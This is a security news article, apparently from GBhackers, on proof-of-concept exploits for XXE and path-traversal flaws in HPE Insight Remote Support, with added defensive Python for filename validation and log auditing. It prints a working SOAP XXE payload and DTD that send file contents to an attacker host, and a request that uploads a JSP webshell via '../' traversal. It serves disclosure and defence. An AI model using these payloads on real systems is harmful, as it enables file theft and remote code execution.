PoC Released for HPE Remote Support Tool Vulnerability Allowing Remote Code Execution

Security researchers have released proof-of-concept (PoC) exploit code for critical vulnerabilities in Hewlett Packard Enterprise’s (HPE) Insight Remote Support (IRS) tool, including an unauthenticated XML External Entity (XXE) injection flaw (CVE-2024-53675) and a path traversal-based remote code execution (RCE) vulnerability (CVE-2024-53676). 

These flaws affect IRS versions prior to v7.14.0.629 and expose systems to arbitrary file disclosure and full SYSTEM-level command execution.

Technical Breakdown of Exploitation Chain

XXE Vulnerability in Device Registration Workflow (CVE-2024-53675)

The XXE vulnerability originates in the validateAgainstXSD method of HPE’s ucacore library, which processes XML input during device registration without restricting Document Type Definition (DTD) processing, according to the researchers’ report published on GitHub.

Attackers can exploit this by injecting malicious XML entities into the <tns:identifiers> parameter of SOAP requests to the /DeviceRegistration/DeviceRegistration.svc endpoint.

Below is an abridged PoC exploiting the XXE to exfiltrate the first line of C:\users\Administrator\Desktop\hello.txt:

<soap12:Envelope xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
    <soap12:Header>
        <wsa:Action>http://www.hp.com/it/sa/reg/Registration/RegisterDevice</wsa:Action>
    </soap12:Header>
    <soap12:Body>
        <tns:RegisterDevice>
            <tns:identifiers>
                <![CDATA[<!DOCTYPE a SYSTEM "http://ATTACKER_IP/malicious.dtd">
                <a>&callhome;</a>]]>
            </tns:identifiers>
        </tns:RegisterDevice>
    </soap12:Body>
</soap12:Envelope>

The attacker-hosted malicious.dtd forces the XML parser to leak file contents through an HTTP request:

<!ENTITY % file SYSTEM "file:///C:\users\Administrator\Desktop\hello.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://ATTACKER_IP/?content=%file;'>">
%eval;
%exfiltrate;

Path Traversal to RCE (CVE-2024-53676)

The RCE vulnerability resides in the processAtatchmentDataStream method of the DataPackageReceiverWebSvcHelper class.

This function improperly validates the attachmentName parameter during file uploads to the /DataPackageReceiver/DataPackageReceiverService.svc endpoint, enabling directory traversal. 

Attackers can upload malicious JSP files to arbitrary directories (e.g., Tomcat web roots) by crafting SOAP requests with ../ sequences:

xml_body = f"""
<web:DataPackageSubmissionRequest>
    <web:attachments>
        <web:ArrayOfAttachment>
            <web:Attachment>
                <web:FileName>../../webapps/ROOT/shell.jsp</web:FileName>
                <web:FileContent>{base64.b64encode(malicious_jsp).decode()}</web:FileContent>
            </web:Attachment>
        </web:ArrayOfAttachment>
    </web:attachments>
</web:DataPackageSubmissionRequest>
"""

The vulnerability stems from the unvalidated string concatenation that builds attachmentFileLocation, which lets an attacker-supplied name escape the upload directory and overwrite critical system files:

String attachmentFileLocation = attachmentFileDirectory + File.separatorChar + attachmentName;
File file = new File(attachmentFileLocation);
file.createNewFile(); // Writes attacker-controlled content to arbitrary paths
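The defensive counterpart to the snippet above, as an added Python example written for this article (it is not HPE’s code; the upload directory, the extension allow-list and the function names are assumptions). It shows the two controls the vulnerable concatenation lacks: an allow-list on the bare file name that rejects separators of either convention, and a containment check on the normalised result, so that the FileName value from the PoC is refused before anything touches the disk:

```python
import os
import re

# Allow-list for a bare attachment name: no separators of either convention,
# no leading dot (so "." and ".." cannot match), no NUL, bounded length.
_SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")

# Assumed allow-list of data-package extensions; adjust to what the service
# actually accepts. Server-executable types such as .jsp are never on it.
ALLOWED_SUFFIXES = (".zip", ".xml", ".txt", ".log")


def resolve_attachment_path(attachment_dir, attachment_name, allowed_suffixes=ALLOWED_SUFFIXES):
    """Return the absolute on-disk path for an upload, or raise ValueError.

    Two independent controls, so a bypass of one is still caught by the other:
      1. the name itself must pass the allow-list (shape and extension);
      2. the joined path must still sit inside attachment_dir after
         normalisation (defence in depth against a future allow-list mistake).
    """
    if not _SAFE_NAME.fullmatch(attachment_name):
        raise ValueError(f"rejected attachment name: {attachment_name!r}")
    if not attachment_name.lower().endswith(allowed_suffixes):
        raise ValueError(f"rejected attachment type: {attachment_name!r}")

    base = os.path.abspath(attachment_dir)
    candidate = os.path.abspath(os.path.join(base, attachment_name))
    # commonpath() is separator-aware; a plain startswith() check would let
    # "/srv/irs/uploads-evil" pass as a child of "/srv/irs/uploads".
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"attachment path escapes {base}: {candidate}")
    return candidate


def is_accepted(attachment_dir, attachment_name):
    """Convenience wrapper: True if the name would be written, False if rejected."""
    try:
        resolve_attachment_path(attachment_dir, attachment_name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: the advisory's traversal name, its backslash twin,
    # a bare webshell name, and a legitimate package name.
    for name in ("../../webapps/ROOT/shell.jsp", "..\\..\\webapps\\ROOT\\shell.jsp",
                 "shell.jsp", "package-0042.zip"):
        verdict = "accepted" if is_accepted("/srv/irs/uploads", name) else "rejected"
        print(f"{name!r:45} -> {verdict}")
```

The backslash variant matters because the service runs on Windows: a check that only strips "/" would let "..\\" through on that platform, which is why the allow-list refuses both separators outright instead of trying to sanitise them.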

While the XXE exploit reliably leaks first-line file contents, researchers noted limitations in retrieving multi-line files due to parser constraints. 

The RCE exploit, however, faces a critical dependency: successful exploitation requires a valid oosId (device registration token) and registrationToken, which attackers must obtain via other means (e.g., brute-forcing or leveraging the XXE to steal tokens).

In lab environments, unregistered devices triggered errors that halted attachment processing:

[ERROR] DataPackageReceiverWebSvcHelper: This device (oosId: 93f6…e39) is not found…aborted processing. 

Despite this, attackers with valid credentials (e.g., compromised partner accounts) could chain both vulnerabilities to:

  1. Steal oosId/registrationToken via XXE
  2. Upload JSP webshells via RCE

Mitigation and Patch Status

HPE addressed both issues in IRS v7.14.0.629 through:

  1. Disabling DTD processing in XML validators
  2. Implementing input sanitization for attachmentName parameters
  3. Adding authentication checks for device registration workflows

Organizations using IRS should immediately upgrade to the patched version and audit logs for suspicious SOAP requests to /DeviceRegistration or /DataPackageReceiver endpoints.

Network defenders can also block external access to these paths if HPE IRS operates in an internal-only capacity.
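As an added example (not from the advisory, the researchers or HPE), the following Python script applies the first mitigation and the log review recommended above to a handful of constructed log lines. It gates XML text on the presence of a DTD or entity declaration, the textual equivalent of disabling DTD processing, and flags requests to the two endpoints that come from outside the internal ranges, carry such a declaration, or carry a traversal sequence. The log format, the internal networks and every sample line are assumptions made for the example:

```python
import ipaddress
import re

# Endpoints named in the advisory.
REGISTRATION_SVC = "/DeviceRegistration/DeviceRegistration.svc"
RECEIVER_SVC = "/DataPackageReceiver/DataPackageReceiverService.svc"

# Assumption: IRS is internal-only, so only these client ranges should reach it.
INTERNAL_NETS = (ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16"))

# A DOCTYPE or ENTITY declaration anywhere in text handed to an XML parser.
_DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)
# ".." followed by a raw or URL-encoded separator of either convention.
_TRAVERSAL_RE = re.compile(r"\.\.(?:/|\\|%2f|%5c)", re.IGNORECASE)
# Assumed proxy log shape: ts src method path status body="<excerpt>"
_LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) body="(?P<body>.*)"$'
)


def reject_dtd(xml_text):
    """Parser-side gate: True if the text must be refused before parsing.

    Apply it to every string that reaches a parser, including content lifted
    out of a CDATA section and parsed a second time, as the registration
    workflow does with <tns:identifiers>.
    """
    return bool(_DTD_RE.search(xml_text))


def audit_line(line):
    """Return the list of reasons a single log line deserves attention."""
    m = _LINE_RE.match(line)
    if not m or m["path"] not in (REGISTRATION_SVC, RECEIVER_SVC):
        return []
    findings = []
    try:
        src = ipaddress.ip_address(m["src"])
        internal = any(src in net for net in INTERNAL_NETS)
    except ValueError:
        internal = False  # unparsable source: treat as untrusted
    if not internal:
        findings.append("request to IRS endpoint from outside the internal ranges")
    if m["path"] == REGISTRATION_SVC and reject_dtd(m["body"]):
        findings.append("DTD or entity declaration in registration body (CVE-2024-53675 pattern)")
    if m["path"] == RECEIVER_SVC and _TRAVERSAL_RE.search(m["body"]):
        findings.append("traversal sequence in attachment upload (CVE-2024-53676 pattern)")
    return findings


def audit_log(lines):
    """Return (line_number, reason) pairs for every finding across the log."""
    return [(n, reason) for n, line in enumerate(lines, 1) for reason in audit_line(line)]


# Constructed sample: one benign registration, one XXE attempt from an external
# address, one traversal upload, one unrelated request, one benign upload.
SAMPLE_LOG = [
    '2025-03-05T09:58:11Z 10.20.4.15 POST /DeviceRegistration/DeviceRegistration.svc 200 body="<tns:identifiers>SN=ABC123</tns:identifiers>"',
    "2025-03-05T10:02:37Z 203.0.113.7 POST /DeviceRegistration/DeviceRegistration.svc 200 "
    "body=\"<tns:identifiers><![CDATA[<!DOCTYPE a SYSTEM 'http://198.51.100.9/x.dtd'><a>&callhome;</a>]]></tns:identifiers>\"",
    '2025-03-05T10:05:02Z 10.20.4.15 POST /DataPackageReceiver/DataPackageReceiverService.svc 200 body="<web:FileName>../../webapps/ROOT/shell.jsp</web:FileName>"',
    '2025-03-05T10:06:40Z 10.20.4.15 GET /healthcheck 200 body=""',
    '2025-03-05T10:07:15Z 10.20.4.15 POST /DataPackageReceiver/DataPackageReceiverService.svc 200 body="<web:FileName>report-0042.zip</web:FileName>"',
]

if __name__ == "__main__":
    for n, reason in audit_log(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

On the Java stack IRS runs on, the parser-level equivalent of reject_dtd is enabling the http://apache.org/xml/features/disallow-doctype-decl feature on the DocumentBuilderFactory or SAXParserFactory, which makes the parser throw on any DOCTYPE rather than relying on a textual pre-check. The traversal regex is a detection aid for log review only; the write path itself still needs a file-name allow-list.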


Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
